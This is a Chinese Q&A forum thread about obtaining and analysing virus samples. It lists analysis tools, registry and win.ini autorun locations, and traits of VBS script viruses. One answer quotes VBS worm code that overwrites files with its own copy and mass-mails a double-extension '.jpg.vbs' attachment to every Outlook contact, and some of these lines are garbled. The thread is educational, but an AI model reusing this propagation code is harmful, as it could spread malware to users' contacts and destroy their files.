[250分的问题]关于病毒样本和病毒分析和病毒分析工具、方法

Posted 2023-03-23

题目说的差不多的了。

我想知道的是，病毒样本要从哪里来？要怎么分析？

有了样本后，要怎么分析？要靠什么软件？

分析病毒要什么工具、软件、什么环境、系统什么的。。

方法呢？？

求教了

是不是要学反编汇啊。。。

最好带有连接的教程和工具下载，有病毒的勿发，谢谢。

答案满意的话追加50分，人品保证！

1病毒样本要从哪里来
就病毒代码的存在形式来说，有两种，一种是病毒自身是个独立的程序文件，另一种是它附着在正常的程序文件上，即所谓的感染，所以，病毒样本其实就是指怀疑为病毒或染毒的文件
不过实际上，病毒程序并不一定象你说的那样清清楚楚的有个主程序，现在的病毒木马，都是几个程序文件组成，相互保护、相互调用运行，它们都是病毒样本
病毒的发作状态，有些是能察觉出来的，比如：增加了进程、电脑速度或网速变慢、系统运行报错等等，有些病毒发作时，几乎没有外在表现，很隐蔽
病毒其实就是一段程序，一是一，二是二，一点也不可怕和神秘，只要不运行它，它就是死的，非常安全，如果你怕在提取过程中误运行了病毒，可以把病毒程序文件的扩展名改一下，改为不可被执行或被直接打开的扩展名即可，或根本就不要扩展名，这样在拷贝、传输过程中就非常安全了

2要怎么分析
（1）http://www.qiker.com/jiaocheng/heibai6/%B2%A1%B6%BE%D0%C5%CF%A2/vir00041.htm（病毒分析祥解）
（2）一、Vbs脚本病毒的特点及发展现状
VBS病毒是用VB Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。应该说病毒就是一种思想，但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点：
1．编写简单，一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。
2．破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃，网络发生严重阻塞。
3．感染力强。由于脚本是直接解释执行，并且它不需要像PE病毒那样，需要做复杂的PE文件格式处理，因此这类病毒可以直接通过自我复制的方式感染其他同类文件，并且自我的异常处理变得非常容易。
4．传播范围大。这类病毒通过htm文档，Email附件或其它方式，可以在很短时间内传遍世界各地。
5．病毒源码容易被获取，变种多。由于VBS病毒解释执行，其源代码可读性非常强，即使病毒源码经过加密处理后，其源代码的获取还是比较简单。因此，这类病毒变种比较多，稍微改变一下病毒的结构，或者修改一下特征值，很多杀毒软件可能就无能为力。
6．欺骗性强。脚本病毒为了得到运行机会，往往会采用各种让用户不大注意的手段，譬如，邮件的附件名采用双后缀，如.jpg.vbs，由于系统默认不显示后缀，这样，用户看到这个文件的时候，就会认为它是一个jpg图片文件。
7．使得病毒生产机实现起来非常容易。所谓病毒生产机，就是可以按照用户的意愿，生产病毒的机器（当然，这里指的是程序），目前的病毒生产机，之所以大多数都为脚本病毒生产机，其中最重要的一点还是因为脚本是解释执行的，实现起来非常容易，具体将在我们后面谈及。
正因为以上几个特点，脚本病毒发展异常迅猛，特别是病毒生产机的出现，使得生成新型脚本病毒变得非常容易。

二、Vbs脚本病毒原理分析
1．vbs脚本病毒如何感染、搜索文件
VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间，譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部，并在顶部加入一条调用病毒代码的语句，而爱虫病毒则是直接生成一个文件的副本，将病毒代码拷入其中，并以原文件名作为病毒文件名的前缀，vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理：
以下是文件感染的部分关键代码：
Set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件（即病毒本身）
vbscopy=self.readall ' 读取病毒全部代码到字符串变量vbscopy……
set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件，准备写入病毒代码
ap.write vbscopy ' 将病毒代码覆盖目标文件
ap.close
set cop=fso.getfile(目标文件.path) '得到目标文件路径
cop.copy(目标文件.path & ".vbs") ' 创建另外一个病毒文件（以.vbs为后缀）
目标文件.delete(true) '删除目标文件
上面描述了病毒文件是如何感染正常文件的：首先将病毒自身代码赋给字符串变量vbscopy，然后将这个字符串覆盖写到目标文件，并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本，最后删除目标文件。
下面我们具体分析一下文件搜索代码：
'该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本
sub scan(folder_) 'scan函数定义，
on error resume next '如果出现错误，直接跳过，防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 当前目录的所有文件集合
for each file in filesext=fso.GetExtensionName(file) '获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext="mp5" then '如果后缀名是mp5，则进行感染。请自己建立相应后缀名的文件，最好是非正常后缀名 ，以免破坏正常程序。
Wscript.echo (file)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders '搜索其他目录；递归调用
scan( )
scan(subfolder)
next
end sub
上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍，非常巧妙，采用了一个递归的算法遍历整个分区的目录和文件。

2．vbs脚本病毒通过网络传播的几种方式及代码分析
VBS脚本病毒之所以传播范围广，主要依赖于它的网络传播功能，一般来说，VBS脚本病毒采用如下几种方式进行传播：
1）通过Email附件传播
这是一种用的非常普遍的传播方式，病毒可以通过各种方法拿到合法的Email地址，最常见的就是直接取outlook地址簿中的邮件地址，也可以通过程序在用户文档（譬如htm文件）中搜索Email地址。
下面我们具体分析一下VBS脚本病毒是如何做到这一点的：
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //创建一个OUTLOOK应用的对象
If outlookApp= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI") //获取MAPI的名字空间
Set addrList= mapiObj.AddressLists //获取地址表的个数
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count //获取每个地址表的Email记录数
For addrEntIndex= 1 To addrEntCount //遍历地址表的Email地址
Set item = outlookApp.CreateItem(0) //获取一个邮件对象实例
Set addrEnt = addr.AddressEntries(addrEntIndex) //获取具体Email地址
item.To = addrEnt.Address //填入收信人地址 item.Subject = "病毒传播实验" //写入邮件标题
item.Body = "这里是病毒邮件传播测试，收到此信请不要慌张！" //写入文件内容
Set attachMents=item.Attachments //定义邮件附件
attachMents.Add fileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs"
item.DeleteAfterSubmit = True //信件提交后自动删除
If item.To <> "" Then
item.Send //发送邮件
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //病毒标记，以免重复感染
End If
Next
End If
Next
End if
End Function

太多了~你能不能自己去看？百度发不来~还有250分
http://topic.csdn.net/t/20040717/09/3183195.html 参考技术A 1.Regfix 这里面收集了金山IE修复和瑞星注册表修复工具。
2.IceSword (冰刃) 这版本有点老了(1.04的)不过新版本应用有危险所以放稳定的.内部功能是十分强大，用于查探系统中的幕后黑手-木马后门，并作出处理。使用了大量新颖的内核技术，使得这些后门躲无所躲。
3.HijackThis 能够扫描注册表和硬盘上的特定文件，找到一些恶意程序“劫持”浏览器，各代码作用可参照帮助。压缩包中放了汉化版和原版.
4.ResScope 一个类似 eXeScope 的软件资源分析和编辑工具，功能已超过 eXeScope。
5.PEID 是最强大的一个查壳工具。增加WinNT平台下的自动脱壳器插件,可以应对现在大部分的软件脱壳.
6.ServiWin 程序可以显示已安装在您的系统中的服务和驱动程序列表。允许您方便地控制服务和驱动程序的状态，更改服务和驱动程序的启动类型，以不同的颜色区分不同的状态和启动类型，并可以将列表保存为文件或网页报告。
7.SrvInstw 可将任何程序加为Win系统服务的软件,也可以卸载系统服务或驱动! 手动清理病毒要用到.
8.SniffPass可以捕捉本机和局域网中POP3, IMAP4, SMTP, FTP, 和 HTTP等协议的密码。打开后按F9捕捉方式选择winpcap...下面是你的网卡。可以用来捕捉木马发送的密码.
9.WSockExpert 嗅探工具.自己学怎么用吧....
10.CapExpert 抓包工具。比上面的WSockExpert厉害，分析可疑数据，只要是马，一定会向外或向内发送或接收数据的.可以检查，跟踪灰鸽子等后门效果特好，能查到对方IP...

上面是网上查来的 不知道专业查毒用什么工具 但对非专业查毒这些工具已经够全面了
另外我再推荐四个软件
1.Ashampoo UnInstaller Platinum Suite(小巧而强大的系统监视及完美清理工具)
2.RegSnap(注册表监控对比工具)
3.Iris(嗅探工具)
4.C32Asm( 反编译)
一般你开上上面3个工具 运行病毒 就基本能知道病毒的行为了 知道它做了什么 当然也就知道你该怎么清除它 这应该属于查到毒之后的杀毒范畴

然后就是怎么定义病毒 （定义病毒的特征码）
这个不是很了解 不同杀毒软件定义不同 习惯也不同 比如诺顿喜欢在PE文件头部定义 有些杀毒软件在病毒中间定义 但特征码不会很长
可能要用到下面的工具
PEID 查壳的 病毒98%都是加了壳的 当然要脱了才能分析
怎么脱壳就是可以开一门课了
然后C32Asm 反编译一下 然后就要用汇编知识来分析了 （我不会汇编。。。）

差不多这样吧本回答被提问者采纳 参考技术B EXE后缀型病毒文件，手工提取样本

这类病毒一般是以进程的方式运行，比较容易发现。.exe文件病毒被激活后，一般会开机后自动加载，所以我们只需要把操作系统的各个自动加载的地方找到，然后查看可疑的.exe文件，就可以把病毒样本找出来了

1.注册表(开始>运行>regedit)

以下位置为注册表十三处启动项位置，依次查看各启动项加载的文件，就可把病毒样本找出来

HKLM-Software-Microsoft-WindowsNT-CurrentVersion-Winlogon-Userinit

HKLM-Software-Microsoft-WindowsCurrentVersion-Policies-Explorer-Run

HKLM-Software-Microsoft-Windows-CurrentVersion-Run-Services-Once

HKLM-Software-Microsoft-Windows-CurrentVersion-Run-Services

HKLM-Software-Microsoft-Windows-Current-Version-RunOnce

HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnceEx

HKLM-Software-Microsoft-Windows-CurrentVersion-Run

HKCU-Software-Microsoft-WindowsNT-CurrentVersion-Windows-load

HKCU-Software-Microsoft-WindowsCurrentVersion-Policies-Explorer-Run

HKCU-Software-Microsoft-Windows-CurrentVersion-Run-Services-Once

HKCU-Software-Microsoft-Windows-Current-Version-RunOnce

HKCU-Software-Microsoft-Windows-CurrentVersion-Run-Services

HKCU-Software-Microsoft-Windows-CurrentVersion-Run

例子：如维金病毒会在HKCU-Software-Microsoft-WindowsNT-CurrentVersion-Windows-load处加载rundl132.exe病毒文件

2.系统WIN.INI文件内 (c:\windows\win.ini或c:\winnt.ini)

在win.ini文件中，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动件。也许你会问了我是XP系统啊 怎么没有这个呢？不必担心给你个正确的你参考下就知道有没有可疑程序了。下边就是正常的WIN.INI(XP)：

正常的c:\windows\win.ini
不正常的c:\windows\win.ini

; for 16-bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

[MCI Extensions.BAK]

aif=MPEGVideo

aifc=MPEGVideo

aiff=MPEGVideo

asf=MPEGVideo

asx=MPEGVideo

au=MPEGVideo

m1v=MPEGVideo

m3u=MPEGVideo

mp2=MPEGVideo

mp2v=MPEGVideo

mp3=MPEGVideo

mpa=MPEGVideo

mpe=MPEGVideo

mpeg=MPEGVideo

mpg=MPEGVideo

mpv2=MPEGVideo

snd=MPEGVideo

wax=MPEGVideo

wm=MPEGVideo

wma=MPEGVideo

wmv=MPEGVideo

wmx=MPEGVideo

wpl=MPEGVideo

wvx=MPEGVideo
; for 16-bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

Load=c:\windows\system32\svch0st.exe

Run=c:\windows\Iexplore.exe

[MCI Extensions.BAK]

aif=MPEGVideo

aifc=MPEGVideo

aiff=MPEGVideo

asf=MPEGVideo

asx=MPEGVideo

au=MPEGVideo

m1v=MPEGVideo

m3u=MPEGVideo

mp2=MPEGVideo

mp2v=MPEGVideo

mp3=MPEGVideo

mpa=MPEGVideo

mpe=MPEGVideo

mpeg=MPEGVideo

mpg=MPEGVideo

mpv2=MPEGVideo

snd=MPEGVideo

wax=MPEGVideo

wm=MPEGVideo

wma=MPEGVideo

wmv=MPEGVideo

wmx=MPEGVideo

wpl=MPEGVideo

wvx=MPEGVideo

3.SYSTEM.INI文件中 (c:\windows\system.ini或c:\winnt\system.ini)

在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe 程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。又会有人问了，我是XP系统怎么又不一样呢？给你个正常的XP系统的SYSTEM.INI，请大家可以参考下正常的SYSTEM.INI文件：

; for 16-bit app support

[drivers]

wave=mmdrv.dll

timer=timer.drv

[mci]

[driver32]

[386enh]

woafont=app936.FON

EGA80WOA.FON=EGA80WOA.FON

EGA40WOA.FON=EGA40WOA.FON

CGA80WOA.FON=CGA80WOA.FON

CGA40WOA.FON=CGA40WOA.FON

4.在Config.sys内 (c:\config.sys)

这类加载方式比较少见，但是并不是没有。如果上述方法都找不到的话，请来这里也许会有收获的。

5.在Autuexec.bat内

这类加载方式也是比较少见，建议跟Config.sys方法一样。

4和5的加载方式建议大家先必须确定计算机有病毒，并且上边的方法都找不到后，最后来这里进行查找。

总结：这类病毒是比较容易暴露的，找到病毒本样后，用winrar或winzip把文件压缩，然后手动删除这些病毒文件。

参考资料：http://www.vccn.com.cn/shownews.asp?id=402

参考技术C 看样子,你还差得很远,什么都还没弄明白就想分析病毒?

呵呵...

病毒实际上也只不过是程序,用各种不同的计算机语言编写出来,只要把病毒放在相同的计算机语言环境下,那么病毒也只不过是语句而已.

这种东西是不能一步登天的,扎扎实实从基本的东西学起吧,到时候自然会明白. 参考技术D 编程，至少会一种编程语言，才能看懂病毒，
最简单的分析病毒；记事本，扩展名改为 .txt 下面想要看懂就要靠编程了

对中病毒微信样本的逆向分析

病毒样本分析